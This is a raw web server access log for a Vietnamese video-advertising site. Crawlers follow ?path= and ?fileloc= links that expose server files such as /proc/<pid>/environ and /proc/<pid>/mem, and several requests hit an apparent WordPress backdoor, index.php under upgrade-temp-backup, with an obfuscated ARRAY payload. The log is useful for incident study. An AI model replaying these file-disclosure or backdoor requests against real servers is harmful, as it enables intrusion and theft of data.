52.167.144.54 - - [10/Nov/2025:00:53:28 +0000] "GET /robots.txt HTTP/1.1" 200 149 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:53:29 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/cpu1/cache/index0 HTTP/1.1" 200 3449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:53:30 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/mountinfo&path=//proc/657 HTTP/1.1" 200 3757 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:53:30 +0000] "GET /191lgfam1099.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:53:31 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/setgroups&path=//proc/657 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:53:31 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/autogroup&path=//proc/661 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.79.248.20 - - [10/Nov/2025:00:53:32 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733393439322p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733353839322q3664346330306363633765623933653937613637373137353266613364356632222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
51.77.43.178 - - [10/Nov/2025:00:53:32 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/syscall&path=//proc/661 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
3.221.156.96 - - [10/Nov/2025:00:53:32 +0000] "GET /our-works/tvc-jokky/?path=//sys/class/input/mouse2 HTTP/1.1" 200 3117 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:53:33 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/mem&path=//proc/661 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
40.77.167.0 - - [10/Nov/2025:00:53:34 +0000] "GET /?products=41571900 HTTP/1.1" 200 24680 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:53:35 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/auxv&path=//proc/661 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
98.82.39.241 - - [10/Nov/2025:00:53:36 +0000] "GET /our-works/tvc-kimino/?path=//sys/block/loop0/bdi HTTP/1.1" 200 3211 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:53:36 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/patch_state&path=//proc/661 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:53:36 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/personality&path=//proc/659 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:53:37 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/cpu1/cache/index2 HTTP/1.1" 200 3450 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:53:37 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/setgroups&path=//proc/661 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:53:37 +0000] "GET /99xavw12533.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.197.178.107 - - [10/Nov/2025:00:53:37 +0000] "GET /our-works/tvc-calci/?path=//sys/kernel/slab/inotify_inode_mark HTTP/1.1" 200 4090 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:53:38 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/comm&path=//proc/659 HTTP/1.1" 200 2614 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:00:53:38 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fsys%2Fclass%2Fblock%2Fsda%2Fsda1%2Fsubsystem%2Floop0%2Falignment_offset&path=%2F%2Fproc%2Fself%2Froot%2Fsys%2Fclass%2Fblock%2Fsda%2Fsda1%2Fsubsystem%2Floop0 HTTP/1.1" 200 2694 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:00:53:38 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/numa_maps&path=//proc/657 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:53:42 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/timers&path=//proc/661 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
3.94.157.25 - - [10/Nov/2025:00:53:43 +0000] "GET /our-works/tvc-calci/?path=//sys/kernel/slab/inotify_inode_mark HTTP/1.1" 200 4090 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:53:43 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/mountinfo&path=//proc/661 HTTP/1.1" 200 3757 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:53:44 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/cgroup&path=//proc/661 HTTP/1.1" 200 2736 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:53:44 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/auxv&path=//proc/661 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:53:45 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/cpu1/power HTTP/1.1" 200 3410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:53:45 +0000] "GET /199dowi1105.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:53:46 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/personality&path=//proc/661 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:53:48 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/smaps&path=//proc/661 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
98.83.94.113 - - [10/Nov/2025:00:53:49 +0000] "GET /our-works/phu-long-corporate-video/?fileloc=//bin/realpath&path=//bin HTTP/1.1" 200 2596 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:53:49 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/smaps&path=//proc/657 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:53:50 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/coredump_filter&path=//proc/659 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:53:50 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/projid_map&path=//proc/659 HTTP/1.1" 200 2624 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
44.194.139.149 - - [10/Nov/2025:00:53:52 +0000] "GET /our-works/tvc-kimino/?path=//sys/block/loop5/trace HTTP/1.1" 500 623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:53:54 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/cpu0/power HTTP/1.1" 200 3410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:53:54 +0000] "GET /31bvg27211.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:53:55 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/timerslack_ns&path=//proc/661 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:53:56 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/clear_refs&path=//proc/661 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:53:56 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/oom_adj&path=//proc/657 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:53:57 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/sched&path=//proc/657 HTTP/1.1" 200 3029 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.79.248.20 - - [10/Nov/2025:00:53:58 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733393531382p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733353931382q3437636335313166306437336564393937616335346563366134653134356338222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
98.82.63.147 - - [10/Nov/2025:00:53:58 +0000] "GET /our-works/tvc-kimino/?path=//sys/kernel/slab/dnotify_mark HTTP/1.1" 499 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:53:58 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/mounts&path=//proc/661 HTTP/1.1" 200 3350 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:53:58 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/projid_map&path=//proc/661 HTTP/1.1" 200 2624 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:53:59 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/cgroup&path=//proc/661 HTTP/1.1" 200 2736 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:53:59 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/cpuset&path=//proc/659 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
18.213.102.186 - - [10/Nov/2025:00:54:00 +0000] "GET /our-works/tv-commercial/tvc-thach-long-hai/?path=//run/systemd/generator/local-fs.target.wants HTTP/1.1" 200 3031 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:00 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/smaps_rollup&path=//proc/661 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:00 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/sched&path=//proc/659 HTTP/1.1" 200 3030 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:54:01 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/cpu0/topology HTTP/1.1" 200 3462 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:54:01 +0000] "GET /81relo44877.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:54:01 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/smaps_rollup&path=//proc/657 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.234.200.207 - - [10/Nov/2025:00:54:02 +0000] "GET /our-works/tvc-relax-gaba/?path=//usr/share/doc/libvorbis0a HTTP/1.1" 200 3017 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:02 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/cmdline&path=//proc/661 HTTP/1.1" 200 2622 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
40.77.167.14 - - [10/Nov/2025:00:54:02 +0000] "GET /?products=258119206 HTTP/1.1" 200 13 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
44.221.180.179 - - [10/Nov/2025:00:54:02 +0000] "GET /our-works/tvc-relax-gaba/?path=//usr/share/doc/libvorbis0a HTTP/1.1" 200 3017 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:03 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/oom_score&path=//proc/657 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.167.144.187 - - [10/Nov/2025:00:54:03 +0000] "GET /?products=1061539652 HTTP/1.1" 200 13 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:04 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/environ&path=//proc/659 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:05 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/schedstat&path=//proc/657 HTTP/1.1" 200 2630 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:54:05 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/cpu0/node0 HTTP/1.1" 200 3946 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:54:06 +0000] "GET /31hgd26535.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:54:06 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/sched&path=//proc/661 HTTP/1.1" 200 3022 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:07 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/uid_map&path=//proc/661 HTTP/1.1" 200 2623 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:09 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/stack&path=//proc/661 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
40.77.167.14 - - [10/Nov/2025:00:54:10 +0000] "GET /?products=224220194 HTTP/1.1" 200 24654 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:11 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/comm&path=//proc/661 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.167.144.187 - - [10/Nov/2025:00:54:12 +0000] "GET /?products=1597738934 HTTP/1.1" 200 26028 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
54.166.104.83 - - [10/Nov/2025:00:54:14 +0000] "GET /our-works/tvc-calci/?path=//sys/module/psmouse/holders HTTP/1.1" 499 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:54:15 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/cpu1/driver/cpu0 HTTP/1.1" 200 3451 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:54:15 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/mountstats&path=//proc/661 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:16 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/clear_refs&path=//proc/661 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:54:16 +0000] "GET /191lgfam1099.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:54:17 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/schedstat&path=//proc/659 HTTP/1.1" 200 2630 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:17 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/oom_score_adj&path=//proc/657 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:00:54:17 +0000] "GET /our-works/tv-commercial/tvc-kimino?fileloc=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-admin%2Fcss%2Fwidgets-rtl.css&path=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-admin%2Fcss HTTP/1.1" 499 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.231.45.47 - - [10/Nov/2025:00:54:18 +0000] "GET /our-works/tvc-jokky/?path=//var/lib/apache2/module HTTP/1.1" 499 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.66.164 - - [10/Nov/2025:00:54:20 +0000] "GET /?products=1704247786 HTTP/1.1" 200 25419 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.77.43.178 - - [10/Nov/2025:00:54:21 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/stack&path=//proc/657 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.84.161.62 - - [10/Nov/2025:00:54:21 +0000] "GET /our-works/tvc-calci/?path=//var/lib/snapd/apparmor HTTP/1.1" 200 3016 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:23 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/wchan&path=//proc/661 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:23 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/gid_map&path=//proc/659 HTTP/1.1" 200 2623 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:24 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/coredump_filter&path=//proc/661 HTTP/1.1" 200 2618 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.79.248.20 - - [10/Nov/2025:00:54:25 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733393534352p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733353934352q6162396633643563363062613538346537376234616665636231323365343362222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
51.77.43.178 - - [10/Nov/2025:00:54:25 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/schedstat&path=//proc/661 HTTP/1.1" 200 2628 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:54:25 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/cpu0/driver HTTP/1.1" 200 3204 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.231.181.240 - - [10/Nov/2025:00:54:26 +0000] "GET /our-works/tvc-kimino/?path=//sys/block/loop0/subsystem HTTP/1.1" 499 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:54:26 +0000] "GET /81relo44877.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.132.10 - - [10/Nov/2025:00:54:26 +0000] "GET /?products=879454 HTTP/1.1" 200 4543 "https://lamphimquangcao.net/?sitemap201.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
51.77.43.178 - - [10/Nov/2025:00:54:26 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/stat&path=//proc/661 HTTP/1.1" 200 2710 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.167.144.150 - - [10/Nov/2025:00:54:27 +0000] "GET /?products=1198171350 HTTP/1.1" 200 13 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:27 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/numa_maps&path=//proc/661 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
